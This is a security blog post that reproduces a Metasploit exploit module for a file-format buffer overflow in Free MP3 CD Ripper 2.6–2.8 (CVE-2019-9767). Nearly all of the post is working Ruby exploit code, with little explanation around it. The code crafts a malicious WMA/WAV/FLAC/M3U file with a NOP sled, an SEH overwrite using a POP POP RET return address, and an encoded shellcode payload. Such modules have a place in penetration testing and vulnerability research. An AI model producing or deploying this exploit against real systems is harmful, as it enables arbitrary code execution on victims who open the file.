Join Free
Categories: Vulnerabilities

Free MP3 CD Ripper 2.8 – Multiple File Buffer Overflow (Metasploit)

Published by
RiSec.Mitch
5 years ago

unnamed 

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Free MP3 CD Ripper 2.6 < 2.8 (.wma.wav.flac.m3u.acc) Buffer Overflow",
      'Description'    => %q{
       This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8.
       By constructing a specially crafted WMA WAV M3U ACC FLAC file and attempting to convert it to an MP3 file in the
       application, a buffer is overwritten, which allows for running shellcode.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Gionathan Reale', # Exploit-DB POC
          'ZwX'              # Metasploit Module
        ],
      'References'     =>
        [
          [ 'CVE', '2019-9767' ],
          [ 'EDB', '45412' ],
          [ 'URL', 'https://www.exploit-db.com/exploits/45412' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Windows 7 x86 - Windows 7 x64',
            {
              'Ret' => 0x66e42121 # POP POP RET
            }
          ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d\x2f"
        },
      'Privileged'     => false,
      'DisclosureDate' => "Sep 09 2018",
      'DefaultTarget'  => 0))

    register_options(
    [
      OptString.new('FILENAME', [true, 'Create malicious file example extension (.wma .wav .acc .flac .m3u)', 'name.wma'])
    ])
  end

  def exploit
    file_payload = payload.encoded

    msfsploit = make_fast_nops(4116)
    msfsploit << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # NSEH_JMP
    msfsploit << [target.ret].pack("V*")  # SEH
    msfsploit << file_payload
    msfsploit << make_fast_nops(4440)

    file_create(msfsploit)
  end
end
Bookmark
Please login to bookmark Close
Social Comments Box
Latest posts by RiSec.Mitch (see all)
Recommended:  Remote Code Execution in pfSense <= 2.5.2
Share the word, let's increase Cybersecurity Awareness as we know it

This post was last modified on 21 November 2020 6:46 AM

RiSec.Mitch

Just your average information security researcher from Delaware US.

Leave a Comment
Share
Published by
RiSec.Mitch
Tags: CD ripper 2.8 File buffer exploit free mp3 overflow
5 years ago

Recent Posts

  • Data Breach News
  • InfoSec News

WH Smith Announces Cyber-Attack: Employee Data Stolen

British high street chain WH Smith has recently revealed that it was hit by a…

2 years ago
  • InfoSec News
  • World Affairs

Voice ID: How Secure is it Really?

As banks worldwide roll out Voice ID as a means of user authentication over the…

2 years ago
  • Cybersecurity Academy
  • InfoSec News

What distinguishes Application Security from API Security?

In the era of digital transformation, cybersecurity has become a major concern for businesses. When…

2 years ago
  • Cybersecurity Academy
  • InfoSec News

The Top 5 Cybersecurity threats facing Businesses Today

In today's digital age, cybersecurity threats have become a significant concern for businesses of all…

2 years ago
  • InfoSec News
  • World Affairs

Enterprise users infected by RIG Exploit Kit thanks to Internet Explorer

The RIG Exploit Kit is currently in the midst of its most productive phase, attempting…

2 years ago
  • Cybersecurity Academy

The Rise and Rise of AI

One of the most transformational technologies of our time, artificial intelligence (AI), has quickly come…

2 years ago

\ Cyber Resources